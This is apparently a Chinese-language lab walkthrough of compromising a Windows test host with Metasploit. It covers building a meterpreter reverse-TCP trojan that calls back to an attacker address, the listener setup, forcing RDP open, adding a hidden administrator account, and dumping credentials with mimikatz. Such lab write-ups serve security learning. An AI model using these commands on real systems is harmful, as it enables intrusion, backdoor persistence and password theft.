MSF回弹木马windows测试
创始人
2024-11-13 08:08:16

windows主机地址为192.168.104.133

kali系统中使用msfvenom命令生成windows系统的回弹木马

msfvenom -p  windows/meterpreter/reverse_tcp  LHOST=192.168.104.131  LPORT=12345  -f exe -o shellreverse.exe 

使用python3 -m http.server 9999来传递文件到windows主机中 

msfconsole

使用mfs开启监听

use exploit/multi/handler  set payload windows/meterpreter/reverse_tcp set lhost 192.168.104.131 set lport 12345 exploit 

此时我们可以查看我们的uid

getuid

使用shell命令进行查看:
 

shell

进入shell环境进行查看:

net user

net user wym

可以查看到自己的权限还是很高的,属于Administrators组

查看端口,发现远程登录端口3389并没有打开

使用命令强行打开3389端口:

run post/windows/manage/enable_rdp

强开端口后就可以进行远程登录

可以使用管理员账号登录或新建一个用户用于登录,但是新建的用户权限较低

管理员账号需在“此电脑”的“管理”的“当地用户和用户组”中打开登录选项,并设置好密码

新建用户:

net user test test123 /add

第一个字符串为账号,第二个字符串为密码

把新用户放到管理员组中去提高权限

net localgroup administrators test /add

因为打开了3389,所以可以使用本机的远程桌面来连接

也可以找到管理员密码来进行登录

使用mimikatz工具:

load kiwi

 使用hashdump来查看hash后的密码

使用help可以查看kiwi的用处

 但是查看密码时会发现权限不够,所以可以使用msf中的getsystem来提权(使用windows中的0day来进行提权,看它是否打了补丁)

getsystem

这边没成功

如果成功了,就可以抓取新的密码了。当然因为当前进程拥有者还是自己,可能还是会失败。所以可以使用 migrate 来迁移进程,来提高权限。

如果把自己的进程迁移到administrator后还是失败。可以考虑是不是mimikatz的版本问题。从github下载新的mimikatz后(远程调控把自己的磁盘加载进去可以把文件放入)放入windows受害机中,然后解压打开它的命令行页面输入mimikatz.exe启动软件使用privilege::debug命令加载权限,再使用sekurlsa::logonpasswords看看版本够不够,有可能版本不够低,需要更换更老的版本

相关内容

热门资讯

裸辞做“一人公司”,我后悔了 去年这个时候,一位以色列程序员正在东南亚旅行。他顺手把一个在脑子里转了很久的想法做成了产品,一个让任...
南京建成国内首个Pre-6G试... 4月21日,2026全球6G技术与产业生态大会在南京开幕。全息互动技术展台前,一名远在北京的工作人员...
超梵求职受邀参加“2025抖音... 超梵求职受邀参加“2025抖音巨量引擎成人教育行业生态大会”,探讨分享优质内容传播,服务万千学员。 ...
摩托罗拉Razr 2026(R... IT之家 4 月 22 日消息,摩托罗拉宣布新一代 Razr 折叠手机将于 4 月 29 日在美国发...
库克卸任,特纳斯领航:苹果新纪... 苹果首席执行官蒂姆·库克将卸任,硬件工程主管约翰·特纳斯将接任,苹果公司今天宣布此事。 库克将在夏季...